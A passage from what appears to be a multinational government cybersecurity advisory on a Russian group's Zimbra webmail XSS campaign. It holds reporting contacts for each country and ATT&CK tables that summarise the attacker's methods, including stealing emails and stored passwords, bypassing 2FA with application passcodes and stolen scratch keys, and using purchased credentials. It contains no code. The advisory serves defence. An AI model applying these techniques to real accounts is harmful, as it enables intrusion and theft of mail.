<p>[5]<a class="ck-anchor"></a> Seqrite. Operation GhostMail: Russian APT exploits Zimbra Webmail to Target Ukraine State Agency. 2026. <a href="https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/" target="_blank">https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/  </a></p>
<h2><strong>Footnotes</strong></h2>
<p><sup>1</sup><a class="ck-anchor"></a> Národní úřad pro kybernetickou a informační bezpečnost<br><sup>2</sup><a class="ck-anchor"></a><sup> </sup>Forsvarets Efterretningstjeneste<br><sup>3</sup><a class="ck-anchor"></a><sup> </sup>Välisluureamet<br><sup>4</sup><a class="ck-anchor"></a> Sotilastiedustelu<br><sup>5</sup><a class="ck-anchor"></a><sup> </sup> Suojelupoliisi<br><sup>6</sup><a class="ck-anchor"></a> Direction générale de la sécurité intérieure<br><sup>7</sup><a class="ck-anchor"></a> Agence nationale de la sécurité des systèmes d’information<br><sup>8</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Esterna<br><sup>9</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Interna<br><sup>10</sup><a class="ck-anchor"></a> Serviciul de Informații și Securitate al Republicii Moldova<br><sup>11 </sup><a class="ck-anchor"></a>Agencja Wywiadu<br><sup>12</sup><a class="ck-anchor"></a><sup> </sup>Służba Kontrwywiadu Wojskowego<br><sup>13</sup><a class="ck-anchor"></a><sup> </sup>Centro Nacional de Inteligencia<br><sup>14 </sup><a class="ck-anchor"></a>Nationellt Cybersäkerhetscenter<br><sup>15</sup><a class="ck-anchor"></a> MITRE and ATT&amp;CK are registered trademarks of The MITRE Corporation. MITRE D3FEND is a trademark of The MITRE Corporation.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>The authoring agencies acknowledge the contributions to this advisory from Palo Alto Networks Unit 42 and Proofpoint.</p>
<h2><strong>Disclaimer of endorsement</strong></h2>
<p>The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<p>Organizations have no obligation to respond or provide information back to the authoring organizations in response to this joint advisory. If, after reviewing the information provided, an organization decides to provide information to the authoring organizations, reporting must be consistent with all applicable laws and policies.</p>
<h2><strong>Purpose</strong></h2>
<p>This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h2><strong>Contact</strong></h2>
<div class="SCXW95230887 BCX8">
<div class="OutlineElement Ltr SCXW95230887 BCX8">
<p><strong>United States organizations </strong></p>
<ul>
<li><strong>National Security Agency</strong> <br>Cybersecurity Report Feedback: <a href="mailto:CybersecurityReports@nsa.gov" target="_blank"><u>CybersecurityReports@nsa.gov</u></a> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DIB_Defense@cyber.nsa.gov" target="_blank"><u>DIB_Defense@cyber.nsa.gov</u></a> <br>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, <a href="mailto:MediaRelations@nsa.gov" target="_blank"><u>MediaRelations@nsa.gov</u></a> </li>
<li><strong>Cybersecurity and Infrastructure Security Agency</strong> <br>CISA’s 24/7 Operations Center (<a href="mailto:contact@cisa.dhs.gov" target="_blank"><u>contact@cisa.dhs.gov</u></a>), or by calling 1-844-Say-CISA (1-844-729-2472). </li>
<li><strong>Federal Bureau of Investigation</strong> <br>If you or someone you know has fallen victim to this campaign, file a complaint with <a class="Hyperlink SCXW95230887 BCX8" href="https://www.ic3.gov/" target="_blank" rel="noreferrer noopener"><u>IC3</u></a>. </li>
<li><strong>Defense Counterintelligence and Security Agency </strong> <br>DCSA Counterintelligence, Cyber Mission Center, Cyber Threat Operations Branch: <a href="mailto:DCSA.CI.CyberOps@mail.mil" target="_blank"><u>DCSA.CI.CyberOps@mail.mil</u></a> <br>Cleared Contactors (CCs) should contact their DCSA Counterintelligence Special Agent to report information pertaining to suspicious contacts or physical/digital efforts to obtain illegal or unauthorized access to the CC’s cleared facility/information, as required by 32 CFR 117. <br>Media/Public Inquiries: <a href="mailto:dcsa.quantico.dcsa-hq.mbx.pa@mail.mil" target="_blank"><u>dcsa.quantico.dcsa-hq.mbx.pa@mail.mil</u></a>  </li>
<li><strong>Department of Defense Cyber Crime Center </strong> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DC3.DCISE@us.af.mil" target="_blank"><u>DC3.DCISE@us.af.mil</u></a> <br>Defense Industrial Base mandatory cyber incident reporting as required by 10 U.S. Code Sections 391 and 393 and Defense Federal Acquisition Regulation Supplement (DFARS) 252.204-7012 is submitted at <a href="https://dibnet.dod.mil/" target="_blank"><u>https://dibnet.dod.mil</u></a> <br>Media Inquiries / Press Desk: <a href="mailto:DC3.Information@us.af.mil" target="_blank"><u>DC3.Information@us.af.mil</u></a> </li>
<li><strong>Naval Criminal Investigative Service</strong> <br>To report criminal activity impacting the United States Navy, go to <a href="http://www.ncis.navy.mil/" target="_blank"><u>www.ncis.navy.mil</u></a> and click “Submit a Tip”</li>
</ul>
<p><strong>Dutch organizations</strong> </p>
<ul>
<li>Defence Intelligence and Security Service (MIVD): <a href="https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid" target="_blank"><u>https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid</u></a>  </li>
<li>General Intelligence and Security Service (AIVD): <a href="https://www.aivd.nl/" target="_blank"><u>https://www.aivd.nl</u></a> </li>
</ul>
<p><strong>Australian organizations </strong></p>
<ul>
<li>Australian Signals Directorate <br>Visit <a href="https://www.cyber.gov.au/about-us/about-asd-acsc/contact-us#no-back" target="_blank"><u>cyber.gov.au</u></a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. </li>
</ul>
<p><strong>Canadian organizations </strong></p>
<ul>
<li>The Canadian Centre for Cyber Security (Cyber Centre), part of the Communications Security Establishment, encourages Canadian organizations to report cyber incidents and to strengthen the security of their networking devices.  <br>Report an incident or suspicious activity to the Cyber Centre by email at <a href="mailto:contact@cyber.gc.ca" target="_blank"><u>contact@cyber.gc.ca</u></a>, online via the reporting tool <a href="https://www.cyber.gc.ca/en/incident-management" target="_blank"><u>Report a cyber incident - Canadian Centre for Cyber Security</u></a> or by phone at 1-833-CYBER-88 (1-833-292-3788). </li>
</ul>
<p><strong>New Zealand organizations </strong></p>
<ul>
<li>New Zealand National Cyber Security Centre (NCSC-NZ): <a href="mailto:info@ncsc.govt.nz" target="_blank"><u>info@ncsc.govt.nz</u></a> </li>
</ul>
<p><strong>United Kingdom organizations </strong></p>
<ul>
<li>Report significant cyber security incidents to <a href="https://ncsc.gov.uk/report-an-incident" target="_blank"><u>ncsc.gov.uk/report-an-incident</u></a> (monitored 24/7) </li>
</ul>
<p><strong>Estonia organizations </strong></p>
<ul>
<li>Estonian Foreign Intelligence Service (EFIS): <a href="mailto:info@valisluureamet.ee" target="_blank"><u>info@valisluureamet.ee</u></a> </li>
</ul>
<p><strong>Finnish organizations </strong></p>
<ul>
<li>Finnish Security and Intelligence Service: <a href="https://supo.fi/en/contact" target="_blank"><u>supo.fi/en/contact</u></a> </li>
</ul>
<p><strong>French organizations </strong></p>
<ul>
<li>French organizations are encouraged to report suspicious activity or incident related information found in this advisory by contacting ANSSI/CERT-FR at: <a href="mailto:cert-fr@ssi.gouv.fr" target="_blank"><u>cert-fr@ssi.gouv.fr</u></a> or by phone at: 3218 or +33 9 70 83 32 18. </li>
</ul>
<p><strong>Italian Organizations </strong></p>
<ul>
<li>Italian External Intelligence and Security Agency (AISE):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a>  </li>
<li>Italian Internal Intelligence and Security Agency (AISI):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a> </li>
</ul>
<div class="OutlineElement Ltr SCXW214395380 BCX8">
<p><strong>Moldovan organizations </strong></p>
</div>
<div class="ListContainerWrapper SCXW214395380 BCX8">
<ul type="disc">
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM): <a href="mailto:cybersec@sis.md" target="_blank"><u>cybersec@sis.md</u></a> </li>
</ul>
</div>
<p><strong>Polish organizations </strong></p>
<ul>
<li>Polish Foreign Intelligence Agency (AW): <a href="mailto:ctiteam@aw.gov.pl" target="_blank"><u>ctiteam@aw.gov.pl</u></a></li>
</ul>
</div>
</div>
<h2><strong>Appendix A: MITRE ATT&amp;CK tactics and techniques</strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table9"><strong>Table 9</strong></a> through <a href="https://www.cisa.gov/#table19"><strong>Table 19</strong></a> for all the threat actor tactics and techniques referenced in this advisory.<a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 9: Reconnaissance </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Credentials </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank"><u>T1589.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to intercept a victim’s password from their password manager. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Email Addresses </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank"><u>T1589.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to grab the victim’s email address from various data stores. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Websites/Domains </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank"><u>T1593</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group likely leverages public information to support target development. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Active Scanning </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank"><u>T1595</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Port scanning can be used by this group to assist with determining exploitability of identified targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Technical Databases: Scan Databases </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank"><u>T1596.005</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Various public datasets can provide information to support discovery of exploitable targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank"><u>T1597</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previously exfiltrated data can be used to enhance target development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources: Purchase Technical Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank"><u>T1597.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Commercial datasets can also be used to support target development efforts. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<div class="WACAltTextDescribedBy SCXW76044448 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 10: Resource Development </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/" target="_blank"><u>T1583</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group used Mullvad VPN to anonymize traffic sent to operational infrastructure. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure: Virtual Private Server </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank"><u>T1583.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group procured VPS servers from a variety of vendors. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank"><u>T1587</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The <em>Ulej</em> capability was developed likely for use by this group to conduct spear phishing campaigns. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Malware </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank"><u>T1587.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel payload that steals a victim’s emails and other sensitive account information. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Exploits </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank"><u>T1587.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel, at the time, cross-site-scripting (XSS) exploit that enables execution of arbitrary JavaScript. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Tool </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank"><u>T1588.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Open source tools, such as Evilginx2, have also been used by the group. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Artificial Intelligence </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank"><u>T1588.007</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group appears to have leveraged AI to support development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stage Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1608/" target="_blank"><u>T1608</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Flowerbed is deployed to a procured server in the cloud. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 11: Initial Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized access to accounts. Additionally, this actor is believed to use previously compromised accounts to conduct spear phishing.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Trusted Relationship </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank"><u>T1199</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The group sends malicious payloads to targeted individuals using previously compromised accounts that might have an established relationship with the target.  </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Phishing </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank"><u>T1566</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The actors used spear phishing to lure users into opening malicious email. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 12: Execution </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exploitation for Client Execution </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank"><u>T1203</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>An XSS vulnerability was leveraged to execute the JavaScript payload. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 13: Persistence </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Manipulation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank"><u>T1098</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Enabling IMAP and Application Passcodes provides persistent access to the compromised account. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 14: Privilege Escalation </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized privileged access to accounts.  </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 15: Stealth </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
